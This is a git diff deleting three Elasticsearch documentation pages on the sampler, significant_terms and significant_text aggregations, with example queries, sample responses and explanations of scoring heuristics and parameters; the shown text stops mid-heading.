a/docs/reference/aggregations/bucket/sampler-aggregation.asciidoc b/docs/reference/aggregations/bucket/sampler-aggregation.asciidoc deleted file mode 100644 index afbdd82f195..00000000000 --- a/docs/reference/aggregations/bucket/sampler-aggregation.asciidoc +++ /dev/null @@ -1,163 +0,0 @@ -[[search-aggregations-bucket-sampler-aggregation]] -=== Sampler aggregation -++++ -Sampler -++++ - -A filtering aggregation used to limit any sub aggregations' processing to a sample of the top-scoring documents. - -.Example use cases: -* Tightening the focus of analytics to high-relevance matches rather than the potentially very long tail of low-quality matches -* Reducing the running cost of aggregations that can produce useful results using only samples e.g. `significant_terms` - - -Example: - -A query on StackOverflow data for the popular term `javascript` OR the rarer term -`kibana` will match many documents - most of them missing the word Kibana. To focus -the `significant_terms` aggregation on top-scoring documents that are more likely to match -the most interesting parts of our query we use a sample. - -[source,console] --------------------------------------------------- -POST /stackoverflow/_search?size=0 -{ - "query": { - "query_string": { - "query": "tags:kibana OR tags:javascript" - } - }, - "aggs": { - "sample": { - "sampler": { - "shard_size": 200 - }, - "aggs": { - "keywords": { - "significant_terms": { - "field": "tags", - "exclude": [ "kibana", "javascript" ] - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:stackoverflow] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "sample": { - "doc_count": 200, <1> - "keywords": { - "doc_count": 200, - "bg_count": 650, - "buckets": [ - { - "key": "elasticsearch", - "doc_count": 150, - "score": 1.078125, - "bg_count": 200 - }, - { - "key": "logstash", - "doc_count": 50, - "score": 0.5625, - "bg_count": 50 - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -<1> 200 documents were sampled in total. The cost of performing the nested significant_terms aggregation was -therefore limited rather than unbounded. - - -Without the `sampler` aggregation the request query considers the full "long tail" of low-quality matches and therefore identifies -less significant terms such as `jquery` and `angular` rather than focusing on the more insightful Kibana-related terms. - - -[source,console] --------------------------------------------------- -POST /stackoverflow/_search?size=0 -{ - "query": { - "query_string": { - "query": "tags:kibana OR tags:javascript" - } - }, - "aggs": { - "low_quality_keywords": { - "significant_terms": { - "field": "tags", - "size": 3, - "exclude": [ "kibana", "javascript" ] - } - } - } -} --------------------------------------------------- -// TEST[setup:stackoverflow] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "low_quality_keywords": { - "doc_count": 600, - "bg_count": 650, - "buckets": [ - { - "key": "angular", - "doc_count": 200, - "score": 0.02777, - "bg_count": 200 - }, - { - "key": "jquery", - "doc_count": 200, - "score": 0.02777, - "bg_count": 200 - }, - { - "key": "logstash", - "doc_count": 50, - "score": 0.0069, - "bg_count": 50 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/0.02777/$body.aggregations.low_quality_keywords.buckets.0.score/] -// TESTRESPONSE[s/0.0069/$body.aggregations.low_quality_keywords.buckets.2.score/] - - - -==== shard_size - -The `shard_size` parameter limits how many top-scoring documents are collected in the sample processed on each shard. -The default value is 100. - -==== Limitations - -[[sampler-breadth-first-nested-agg]] -===== Cannot be nested under `breadth_first` aggregations -Being a quality-based filter the sampler aggregation needs access to the relevance score produced for each document. -It therefore cannot be nested under a `terms` aggregation which has the `collect_mode` switched from the default `depth_first` mode to `breadth_first` as this discards scores. -In this situation an error will be thrown. \ No newline at end of file diff --git a/docs/reference/aggregations/bucket/significantterms-aggregation.asciidoc b/docs/reference/aggregations/bucket/significantterms-aggregation.asciidoc deleted file mode 100644 index 6bd36945eae..00000000000 --- a/docs/reference/aggregations/bucket/significantterms-aggregation.asciidoc +++ /dev/null @@ -1,585 +0,0 @@ -[[search-aggregations-bucket-significantterms-aggregation]] -=== Significant terms aggregation -++++ -Significant terms -++++ - -An aggregation that returns interesting or unusual occurrences of terms in a set. - -.Example use cases: -* Suggesting "H5N1" when users search for "bird flu" in text -* Identifying the merchant that is the "common point of compromise" from the transaction history of credit card owners reporting loss -* Suggesting keywords relating to stock symbol $ATI for an automated news classifier -* Spotting the fraudulent doctor who is diagnosing more than their fair share of whiplash injuries -* Spotting the tire manufacturer who has a disproportionate number of blow-outs - -In all these cases the terms being selected are not simply the most popular terms in a set. -They are the terms that have undergone a significant change in popularity measured between a _foreground_ and _background_ set. -If the term "H5N1" only exists in 5 documents in a 10 million document index and yet is found in 4 of the 100 documents that make up a user's search results -that is significant and probably very relevant to their search. 5/10,000,000 vs 4/100 is a big swing in frequency. - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /reports -{ - "mappings": { - "properties": { - "force": { - "type": "keyword" - }, - "crime_type": { - "type": "keyword" - } - } - } -} - -POST /reports/_bulk?refresh -{"index":{"_id":0}} -{"force": "British Transport Police", "crime_type": "Bicycle theft"} -{"index":{"_id":1}} -{"force": "British Transport Police", "crime_type": "Bicycle theft"} -{"index":{"_id":2}} -{"force": "British Transport Police", "crime_type": "Bicycle theft"} -{"index":{"_id":3}} -{"force": "British Transport Police", "crime_type": "Robbery"} -{"index":{"_id":4}} -{"force": "Metropolitan Police Service", "crime_type": "Robbery"} -{"index":{"_id":5}} -{"force": "Metropolitan Police Service", "crime_type": "Bicycle theft"} -{"index":{"_id":6}} -{"force": "Metropolitan Police Service", "crime_type": "Robbery"} -{"index":{"_id":7}} -{"force": "Metropolitan Police Service", "crime_type": "Robbery"} - -------------------------------------------------- -// TESTSETUP - -////////////////////////// - -==== Single-set analysis - -In the simplest case, the _foreground_ set of interest is the search results matched by a query and the _background_ -set used for statistical comparisons is the index or indices from which the results were gathered. - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "terms": { "force": [ "British Transport Police" ] } - }, - "aggregations": { - "significant_crime_types": { - "significant_terms": { "field": "crime_type" } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "significant_crime_types": { - "doc_count": 47347, - "bg_count": 5064554, - "buckets": [ - { - "key": "Bicycle theft", - "doc_count": 3640, - "score": 0.371235374214817, - "bg_count": 66799 - } - ... - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/: (0\.)?[0-9]+/: $body.$_path/] - -When querying an index of all crimes from all police forces, what these results show is that the British Transport Police force -stand out as a force dealing with a disproportionately large number of bicycle thefts. Ordinarily, bicycle thefts represent only 1% of crimes (66799/5064554) -but for the British Transport Police, who handle crime on railways and stations, 7% of crimes (3640/47347) is -a bike theft. This is a significant seven-fold increase in frequency and so this anomaly was highlighted as the top crime type. - -The problem with using a query to spot anomalies is it only gives us one subset to use for comparisons. -To discover all the other police forces' anomalies we would have to repeat the query for each of the different forces. - -This can be a tedious way to look for unusual patterns in an index - - - -==== Multi-set analysis -A simpler way to perform analysis across multiple categories is to use a parent-level aggregation to segment the data ready for analysis. - - -Example using a parent aggregation for segmentation: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggregations": { - "forces": { - "terms": { "field": "force" }, - "aggregations": { - "significant_crime_types": { - "significant_terms": { "field": "crime_type" } - } - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "forces": { - "doc_count_error_upper_bound": 1375, - "sum_other_doc_count": 7879845, - "buckets": [ - { - "key": "Metropolitan Police Service", - "doc_count": 894038, - "significant_crime_types": { - "doc_count": 894038, - "bg_count": 5064554, - "buckets": [ - { - "key": "Robbery", - "doc_count": 27617, - "score": 0.0599, - "bg_count": 53182 - } - ... - ] - } - }, - { - "key": "British Transport Police", - "doc_count": 47347, - "significant_crime_types": { - "doc_count": 47347, - "bg_count": 5064554, - "buckets": [ - { - "key": "Bicycle theft", - "doc_count": 3640, - "score": 0.371, - "bg_count": 66799 - } - ... - ] - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/: (0\.)?[0-9]+/: $body.$_path/] -// TESTRESPONSE[s/: "[^"]*"/: $body.$_path/] - -Now we have anomaly detection for each of the police forces using a single request. - -We can use other forms of top-level aggregations to segment our data, for example segmenting by geographic -area to identify unusual hot-spots of a particular crime type: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "hotspots": { - "geohash_grid": { - "field": "location", - "precision": 5 - }, - "aggs": { - "significant_crime_types": { - "significant_terms": { "field": "crime_type" } - } - } - } - } -} --------------------------------------------------- - -This example uses the `geohash_grid` aggregation to create result buckets that represent geographic areas, and inside each -bucket we can identify anomalous levels of a crime type in these tightly-focused areas e.g. - -* Airports exhibit unusual numbers of weapon confiscations -* Universities show uplifts of bicycle thefts - -At a higher geohash_grid zoom-level with larger coverage areas we would start to see where an entire police-force may be -tackling an unusual volume of a particular crime type. - - -Obviously a time-based top-level segmentation would help identify current trends for each point in time -where a simple `terms` aggregation would typically show the very popular "constants" that persist across all time slots. - - - -.How are the scores calculated? -********************************** -The numbers returned for scores are primarily intended for ranking different suggestions sensibly rather than something easily understood by end users. The scores are derived from the doc frequencies in _foreground_ and _background_ sets. In brief, a term is considered significant if there is a noticeable difference in the frequency in which a term appears in the subset and in the background. The way the terms are ranked can be configured, see "Parameters" section. - -********************************** - - -==== Use on free-text fields - -The significant_terms aggregation can be used effectively on tokenized free-text fields to suggest: - -* keywords for refining end-user searches -* keywords for use in percolator queries - -WARNING: Picking a free-text field as the subject of a significant terms analysis can be expensive! It will attempt -to load every unique word into RAM. It is recommended to only use this on smaller indices. - -.Use the _"like this but not this"_ pattern -********************************** -You can spot mis-categorized content by first searching a structured field e.g. `category:adultMovie` and use significant_terms on the -free-text "movie_description" field. Take the suggested words (I'll leave them to your imagination) and then search for all movies NOT marked as category:adultMovie but containing these keywords. -You now have a ranked list of badly-categorized movies that you should reclassify or at least remove from the "familyFriendly" category. - -The significance score from each term can also provide a useful `boost` setting to sort matches. -Using the `minimum_should_match` setting of the `terms` query with the keywords will help control the balance of precision/recall in the result set i.e -a high setting would have a small number of relevant results packed full of keywords and a setting of "1" would produce a more exhaustive results set with all documents containing _any_ keyword. - -********************************** - -[TIP] -============ -.Show significant_terms in context - -Free-text significant_terms are much more easily understood when viewed in context. Take the results of `significant_terms` suggestions from a -free-text field and use them in a `terms` query on the same field with a `highlight` clause to present users with example snippets of documents. When the terms -are presented unstemmed, highlighted, with the right case, in the right order and with some context, their significance/meaning is more readily apparent. -============ - -==== Custom background sets - -Ordinarily, the foreground set of documents is "diffed" against a background set of all the documents in your index. -However, sometimes it may prove useful to use a narrower background set as the basis for comparisons. -For example, a query on documents relating to "Madrid" in an index with content from all over the world might reveal that "Spanish" -was a significant term. This may be true but if you want some more focused terms you could use a `background_filter` -on the term 'spain' to establish a narrower set of documents as context. With this as a background "Spanish" would now -be seen as commonplace and therefore not as significant as words like "capital" that relate more strongly with Madrid. -Note that using a background filter will slow things down - each term's background frequency must now be derived on-the-fly from filtering posting lists rather than reading the index's pre-computed count for a term. - -==== Limitations - -===== Significant terms must be indexed values -Unlike the terms aggregation it is currently not possible to use script-generated terms for counting purposes. -Because of the way the significant_terms aggregation must consider both _foreground_ and _background_ frequencies -it would be prohibitively expensive to use a script on the entire index to obtain background frequencies for comparisons. -Also DocValues are not supported as sources of term data for similar reasons. - -===== No analysis of floating point fields -Floating point fields are currently not supported as the subject of significant_terms analysis. -While integer or long fields can be used to represent concepts like bank account numbers or category numbers which -can be interesting to track, floating point fields are usually used to represent quantities of something. -As such, individual floating point terms are not useful for this form of frequency analysis. - -===== Use as a parent aggregation -If there is the equivalent of a `match_all` query or no query criteria providing a subset of the index the significant_terms aggregation should not be used as the -top-most aggregation - in this scenario the _foreground_ set is exactly the same as the _background_ set and -so there is no difference in document frequencies to observe and from which to make sensible suggestions. - -Another consideration is that the significant_terms aggregation produces many candidate results at shard level -that are only later pruned on the reducing node once all statistics from all shards are merged. As a result, -it can be inefficient and costly in terms of RAM to embed large child aggregations under a significant_terms -aggregation that later discards many candidate terms. It is advisable in these cases to perform two searches - the first to provide a rationalized list of -significant_terms and then add this shortlist of terms to a second query to go back and fetch the required child aggregations. - -===== Approximate counts -The counts of how many documents contain a term provided in results are based on summing the samples returned from each shard and -as such may be: - -* low if certain shards did not provide figures for a given term in their top sample -* high when considering the background frequency as it may count occurrences found in deleted documents - -Like most design decisions, this is the basis of a trade-off in which we have chosen to provide fast performance at the cost of some (typically small) inaccuracies. -However, the `size` and `shard size` settings covered in the next section provide tools to help control the accuracy levels. - -[[significantterms-aggregation-parameters]] -==== Parameters - -===== JLH score -The JLH score can be used as a significance score by adding the parameter - -[source,js] --------------------------------------------------- - - "jlh": { - } --------------------------------------------------- -// NOTCONSOLE - -The scores are derived from the doc frequencies in _foreground_ and _background_ sets. The _absolute_ change in popularity (foregroundPercent - backgroundPercent) would favor common terms whereas the _relative_ change in popularity (foregroundPercent/ backgroundPercent) would favor rare terms. Rare vs common is essentially a precision vs recall balance and so the absolute and relative changes are multiplied to provide a sweet spot between precision and recall. - -===== Mutual information -Mutual information as described in "Information Retrieval", Manning et al., Chapter 13.5.1 can be used as significance score by adding the parameter - -[source,js] --------------------------------------------------- - - "mutual_information": { - "include_negatives": true - } --------------------------------------------------- -// NOTCONSOLE - -Mutual information does not differentiate between terms that are descriptive for the subset or for documents outside the subset. The significant terms therefore can contain terms that appear more or less frequent in the subset than outside the subset. To filter out the terms that appear less often in the subset than in documents outside the subset, `include_negatives` can be set to `false`. - -Per default, the assumption is that the documents in the bucket are also contained in the background. If instead you defined a custom background filter that represents a different set of documents that you want to compare to, set - -[source,js] --------------------------------------------------- - -"background_is_superset": false --------------------------------------------------- -// NOTCONSOLE - -===== Chi square -Chi square as described in "Information Retrieval", Manning et al., Chapter 13.5.2 can be used as significance score by adding the parameter - -[source,js] --------------------------------------------------- - - "chi_square": { - } --------------------------------------------------- -// NOTCONSOLE -Chi square behaves like mutual information and can be configured with the same parameters `include_negatives` and `background_is_superset`. - - -===== Google normalized distance -Google normalized distance as described in "The Google Similarity Distance", Cilibrasi and Vitanyi, 2007 (https://arxiv.org/pdf/cs/0412098v3.pdf) can be used as significance score by adding the parameter - -[source,js] --------------------------------------------------- - - "gnd": { - } --------------------------------------------------- -// NOTCONSOLE -`gnd` also accepts the `background_is_superset` parameter. - - -===== Percentage -A simple calculation of the number of documents in the foreground sample with a term divided by the number of documents in the background with the term. -By default this produces a score greater than zero and less than one. - -The benefit of this heuristic is that the scoring logic is simple to explain to anyone familiar with a "per capita" statistic. However, for fields with high cardinality there is a tendency for this heuristic to select the rarest terms such as typos that occur only once because they score 1/1 = 100%. - -It would be hard for a seasoned boxer to win a championship if the prize was awarded purely on the basis of percentage of fights won - by these rules a newcomer with only one fight under their belt would be impossible to beat. -Multiple observations are typically required to reinforce a view so it is recommended in these cases to set both `min_doc_count` and `shard_min_doc_count` to a higher value such as 10 in order to filter out the low-frequency terms that otherwise take precedence. - -[source,js] --------------------------------------------------- - - "percentage": { - } --------------------------------------------------- -// NOTCONSOLE - -===== Which one is best? - - -Roughly, `mutual_information` prefers high frequent terms even if they occur also frequently in the background. For example, in an analysis of natural language text this might lead to selection of stop words. `mutual_information` is unlikely to select very rare terms like misspellings. `gnd` prefers terms with a high co-occurrence and avoids selection of stopwords. It might be better suited for synonym detection. However, `gnd` has a tendency to select very rare terms that are, for example, a result of misspelling. `chi_square` and `jlh` are somewhat in-between. - -It is hard to say which one of the different heuristics will be the best choice as it depends on what the significant terms are used for (see for example [Yang and Pedersen, "A Comparative Study on Feature Selection in Text Categorization", 1997](http://courses.ischool.berkeley.edu/i256/f06/papers/yang97comparative.pdf) for a study on using significant terms for feature selection for text classification). - -If none of the above measures suits your usecase than another option is to implement a custom significance measure: - -===== Scripted -Customized scores can be implemented via a script: - -[source,js] --------------------------------------------------- - - "script_heuristic": { - "script": { - "lang": "painless", - "source": "params._subset_freq/(params._superset_freq - params._subset_freq + 1)" - } - } --------------------------------------------------- -// NOTCONSOLE -Scripts can be inline (as in above example), indexed or stored on disk. For details on the options, see <>. - -Available parameters in the script are - -[horizontal] -`_subset_freq`:: Number of documents the term appears in the subset. -`_superset_freq`:: Number of documents the term appears in the superset. -`_subset_size`:: Number of documents in the subset. -`_superset_size`:: Number of documents in the superset. - -[[sig-terms-shard-size]] -===== Size & Shard Size - -The `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By -default, the node coordinating the search process will request each shard to provide its own top term buckets -and once all shards respond, it will reduce the results to the final list that will then be returned to the client. -If the number of unique terms is greater than `size`, the returned list can be slightly off and not accurate -(it could be that the term counts are slightly off and it could even be that a term that should have been in the top -size buckets was not returned). - -To ensure better accuracy a multiple of the final `size` is used as the number of terms to request from each shard -(`2 * (size * 1.5 + 10)`). To take manual control of this setting the `shard_size` parameter -can be used to control the volumes of candidate terms produced by each shard. - -Low-frequency terms can turn out to be the most interesting ones once all results are combined so the -significant_terms aggregation can produce higher-quality results when the `shard_size` parameter is set to -values significantly higher than the `size` setting. This ensures that a bigger volume of promising candidate terms are given -a consolidated review by the reducing node before the final selection. Obviously large candidate term lists -will cause extra network traffic and RAM usage so this is quality/cost trade off that needs to be balanced. If `shard_size` is set to -1 (the default) then `shard_size` will be automatically estimated based on the number of shards and the `size` parameter. - - -NOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, Elasticsearch will - override it and reset it to be equal to `size`. - -===== Minimum document count - -It is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "significant_terms": { - "field": "tag", - "min_doc_count": 10 - } - } - } -} --------------------------------------------------- - -The above aggregation would only return tags which have been found in 10 hits or more. Default value is `3`. - - - - -Terms that score highly will be collected on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global term frequencies available. The decision if a term is added to a candidate list depends only on the score computed on the shard using local shard frequencies, not the global frequencies of the word. The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. This might cause many (globally) high frequent terms to be missing in the final result if low frequent but high scoring terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic. - -`shard_min_doc_count` parameter - -The parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. If your dictionary contains many low frequent words and you are not interested in these (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty not reach the required `min_doc_count` even after merging the local frequencies. `shard_min_doc_count` is set to `1` per default and has no effect unless you explicitly set it. - - - - -WARNING: Setting `min_doc_count` to `1` is generally not advised as it tends to return terms that - are typos or other bizarre curiosities. Finding more than one instance of a term helps - reinforce that, while still rare, the term was not the result of a one-off accident. The - default value of 3 is used to provide a minimum weight-of-evidence. - Setting `shard_min_doc_count` too high will cause significant candidate terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count/#shards`. - - - -===== Custom background context - -The default source of statistical information for background term frequencies is the entire index and this -scope can be narrowed through the use of a `background_filter` to focus in on significant terms within a narrower -context: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "city": "madrid" - } - }, - "aggs": { - "tags": { - "significant_terms": { - "field": "tag", - "background_filter": { - "term": { "text": "spain" } - } - } - } - } -} --------------------------------------------------- - -The above filter would help focus in on terms that were peculiar to the city of Madrid rather than revealing -terms like "Spanish" that are unusual in the full index's worldwide context but commonplace in the subset of documents containing the -word "Spain". - -WARNING: Use of background filters will slow the query as each term's postings must be filtered to determine a frequency - - -===== Filtering Values - -It is possible (although rarely required) to filter the values for which buckets will be created. This can be done using the `include` and -`exclude` parameters which are based on a regular expression string or arrays of exact terms. This functionality mirrors the features -described in the <> documentation. - -==== Collect mode - -To avoid memory issues, the `significant_terms` aggregation always computes child aggregations in `breadth_first` mode. -A description of the different collection modes can be found in the -<> documentation. - -==== Execution hint - -There are different mechanisms by which terms aggregations can be executed: - - - by using field values directly in order to aggregate data per-bucket (`map`) - - by using <> of the field and allocating one bucket per global ordinal (`global_ordinals`) - -Elasticsearch tries to have sensible defaults so this is something that generally doesn't need to be configured. - -`global_ordinals` is the default option for `keyword` field, it uses global ordinals to allocates buckets dynamically -so memory usage is linear to the number of values of the documents that are part of the aggregation scope. - -`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution mode -is significantly faster. By default, `map` is only used when running an aggregation on scripts, since they don't have -ordinals. - - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "significant_terms": { - "field": "tags", - "execution_hint": "map" <1> - } - } - } -} --------------------------------------------------- - -<1> the possible values are `map`, `global_ordinals` - -Please note that Elasticsearch will ignore this execution hint if it is not applicable. diff --git a/docs/reference/aggregations/bucket/significanttext-aggregation.asciidoc b/docs/reference/aggregations/bucket/significanttext-aggregation.asciidoc deleted file mode 100644 index c98c2ff659f..00000000000 --- a/docs/reference/aggregations/bucket/significanttext-aggregation.asciidoc +++ /dev/null @@ -1,489 +0,0 @@ -[[search-aggregations-bucket-significanttext-aggregation]] -=== Significant text aggregation -++++ -Significant text -++++ - -An aggregation that returns interesting or unusual occurrences of free-text terms in a set. -It is like the <> aggregation but differs in that: - -* It is specifically designed for use on type `text` fields -* It does not require field data or doc-values -* It re-analyzes text content on-the-fly meaning it can also filter duplicate sections of -noisy text that otherwise tend to skew statistics. - -WARNING: Re-analyzing _large_ result sets will require a lot of time and memory. It is recommended that the significant_text - aggregation is used as a child of either the <> or - <> aggregation to limit the analysis - to a _small_ selection of top-matching documents e.g. 200. This will typically improve speed, memory use and quality of - results. - -.Example use cases: -* Suggesting "H5N1" when users search for "bird flu" to help expand queries -* Suggesting keywords relating to stock symbol $ATI for use in an automated news classifier - -In these cases the words being selected are not simply the most popular terms in results. The most popular words tend to be -very boring (_and, of, the, we, I, they_ ...). -The significant words are the ones that have undergone a significant change in popularity measured between a _foreground_ and _background_ set. -If the term "H5N1" only exists in 5 documents in a 10 million document index and yet is found in 4 of the 100 documents that make up a user's search results -that is significant and probably very relevant to their search. 5/10,000,000 vs 4/100 is a big swing in frequency. - -==== Basic use - -In the typical use case, the _foreground_ set of interest is a selection of the top-matching search results for a query -and the _background_set used for statistical comparisons is the index or indices from which the results were gathered. - -Example: - -[source,console] --------------------------------------------------- -GET news/_search -{ - "query": { - "match": { "content": "Bird flu" } - }, - "aggregations": { - "my_sample": { - "sampler": { - "shard_size": 100 - }, - "aggregations": { - "keywords": { - "significant_text": { "field": "content" } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:news] - - -Response: - -[source,console-result] --------------------------------------------------- -{ - "took": 9, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations" : { - "my_sample": { - "doc_count": 100, - "keywords" : { - "doc_count": 100, - "buckets" : [ - { - "key": "h5n1", - "doc_count": 4, - "score": 4.71235374214817, - "bg_count": 5 - } - ... - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:historically skipped] - -The results show that "h5n1" is one of several terms strongly associated with bird flu. -It only occurs 5 times in our index as a whole (see the `bg_count`) and yet 4 of these -were lucky enough to appear in our 100 document sample of "bird flu" results. That suggests -a significant word and one which the user can potentially add to their search. - -[[filter-duplicate-text-noisy-data]] -==== Dealing with noisy data using `filter_duplicate_text` -Free-text fields often contain a mix of original content and mechanical copies of text (cut-and-paste biographies, email reply chains, -retweets, boilerplate headers/footers, page navigation menus, sidebar news links, copyright notices, standard disclaimers, addresses). - -In real-world data these duplicate sections of text tend to feature heavily in `significant_text` results if they aren't filtered out. -Filtering near-duplicate text is a difficult task at index-time but we can cleanse the data on-the-fly at query time using the -`filter_duplicate_text` setting. - - -First let's look at an unfiltered real-world example using the https://research.signalmedia.co/newsir16/signal-dataset.html[Signal media dataset] of -a million news articles covering a wide variety of news. Here are the raw significant text results for a search for the articles -mentioning "elasticsearch": - - -[source,js] --------------------------------------------------- -{ - ... - "aggregations": { - "sample": { - "doc_count": 35, - "keywords": { - "doc_count": 35, - "buckets": [ - { - "key": "elasticsearch", - "doc_count": 35, - "score": 28570.428571428572, - "bg_count": 35 - }, - ... - { - "key": "currensee", - "doc_count": 8, - "score": 6530.383673469388, - "bg_count": 8 - }, - ... - { - "key": "pozmantier", - "doc_count": 4, - "score": 3265.191836734694, - "bg_count": 4 - }, - ... - -} --------------------------------------------------- -// NOTCONSOLE - -The uncleansed documents have thrown up some odd-looking terms that are, on the face of it, statistically -correlated with appearances of our search term "elasticsearch" e.g. "pozmantier". -We can drill down into examples of these documents to see why pozmantier is connected using this query: - -[source,console] --------------------------------------------------- -GET news/_search -{ - "query": { - "simple_query_string": { - "query": "+elasticsearch +pozmantier" - } - }, - "_source": [ - "title", - "source" - ], - "highlight": { - "fields": { - "content": {} - } - } -} --------------------------------------------------- -// TEST[setup:news] - -The results show a series of very similar news articles about a judging panel for a number of tech projects: - -[source,js] --------------------------------------------------- -{ - ... - "hits": { - "hits": [ - { - ... - "_source": { - "source": "Presentation Master", - "title": "T.E.N. Announces Nominees for the 2015 ISE® North America Awards" - }, - "highlight": { - "content": [ - "City of San Diego Mike Pozmantier, Program Manager, Cyber Security Division, Department of", - " Janus, Janus ElasticSearch Security Visualization Engine " - ] - } - }, - { - ... - "_source": { - "source": "RCL Advisors", - "title": "T.E.N. Announces Nominees for the 2015 ISE(R) North America Awards" - }, - "highlight": { - "content": [ - "Mike Pozmantier, Program Manager, Cyber Security Division, Department of Homeland Security S&T", - "Janus, Janus ElasticSearch Security Visualization Engine" - ] - } - }, - ... --------------------------------------------------- -// NOTCONSOLE -Mike Pozmantier was one of many judges on a panel and elasticsearch was used in one of many projects being judged. - -As is typical, this lengthy press release was cut-and-paste by a variety of news sites and consequently any rare names, numbers or -typos they contain become statistically correlated with our matching query. - -Fortunately similar documents tend to rank similarly so as part of examining the stream of top-matching documents the significant_text -aggregation can apply a filter to remove sequences of any 6 or more tokens that have already been seen. Let's try this same query now but -with the `filter_duplicate_text` setting turned on: - -[source,console] --------------------------------------------------- -GET news/_search -{ - "query": { - "match": { - "content": "elasticsearch" - } - }, - "aggs": { - "sample": { - "sampler": { - "shard_size": 100 - }, - "aggs": { - "keywords": { - "significant_text": { - "field": "content", - "filter_duplicate_text": true - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:news] - -The results from analysing our deduplicated text are obviously of higher quality to anyone familiar with the elastic stack: - -[source,js] --------------------------------------------------- -{ - ... - "aggregations": { - "sample": { - "doc_count": 35, - "keywords": { - "doc_count": 35, - "buckets": [ - { - "key": "elasticsearch", - "doc_count": 22, - "score": 11288.001166180758, - "bg_count": 35 - }, - { - "key": "logstash", - "doc_count": 3, - "score": 1836.648979591837, - "bg_count": 4 - }, - { - "key": "kibana", - "doc_count": 3, - "score": 1469.3020408163263, - "bg_count": 5 - } - ] - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -Mr Pozmantier and other one-off associations with elasticsearch no longer appear in the aggregation -results as a consequence of copy-and-paste operations or other forms of mechanical repetition. - -If your duplicate or near-duplicate content is identifiable via a single-value indexed field (perhaps -a hash of the article's `title` text or an `original_press_release_url` field) then it would be more -efficient to use a parent <> aggregation -to eliminate these documents from the sample set based on that single key. The less duplicate content you can feed into -the significant_text aggregation up front the better in terms of performance. - - -.How are the significance scores calculated? -********************************** -The numbers returned for scores are primarily intended for ranking different suggestions sensibly rather than something easily -understood by end users. The scores are derived from the doc frequencies in _foreground_ and _background_ sets. In brief, a -term is considered significant if there is a noticeable difference in the frequency in which a term appears in the subset and -in the background. The way the terms are ranked can be configured, see "Parameters" section. - -********************************** - -.Use the _"like this but not this"_ pattern -********************************** -You can spot mis-categorized content by first searching a structured field e.g. `category:adultMovie` and use significant_text on the -text "movie_description" field. Take the suggested words (I'll leave them to your imagination) and then search for all movies NOT marked as category:adultMovie but containing these keywords. -You now have a ranked list of badly-categorized movies that you should reclassify or at least remove from the "familyFriendly" category. - -The significance score from each term can also provide a useful `boost` setting to sort matches. -Using the `minimum_should_match` setting of the `terms` query with the keywords will help control the balance of precision/recall in the result set i.e -a high setting would have a small number of relevant results packed full of keywords and a setting of "1" would produce a more exhaustive results set with all documents containing _any_ keyword. - -********************************** - - - -==== Limitations - - -===== No support for child aggregations -The significant_text aggregation intentionally does not support the addition of child aggregations because: - -* It would come with a high memory cost -* It isn't a generally useful feature and there is a workaround for those that need it - -The volume of candidate terms is generally very high and these are pruned heavily before the final -results are returned. Supporting child aggregations would generate additional churn and be inefficient. -Clients can always take the heavily-trimmed set of results from a `significant_text` request and -make a subsequent follow-up query using a `terms` aggregation with an `include` clause and child -aggregations to perform further analysis of selected keywords in a more efficient fashion. - -===== No support for nested objects - -The significant_text aggregation currently also cannot be used with text fields in -nested objects, because it works with the document JSON source. This makes this -feature inefficient when matching nested docs from stored JSON given a matching -Lucene docID. - -===== Approximate counts -The counts of how many documents contain a term provided in results are based on summing the samples returned from each shard and -as such may be: - -* low if certain shards did not provide figures for a given term in their top sample -* high when considering the background frequency as it may count occurrences found in deleted documents - -Like most design decisions, this is the basis of a trade-off in which we have chosen to provide fast performance at the cost of some (typically small) inaccuracies. -However, the `size` and `shard size` settings covered in the next section provide tools to help control the accuracy levels. - -[[significanttext-aggregation-parameters]] -==== Parameters - -===== Significance heuristics - -This aggregation supports the same scoring heuristics (JLH, mutual_information, gnd, chi_square etc) as the <> aggregation - -[[sig-text-shard-size]] -===== Size & 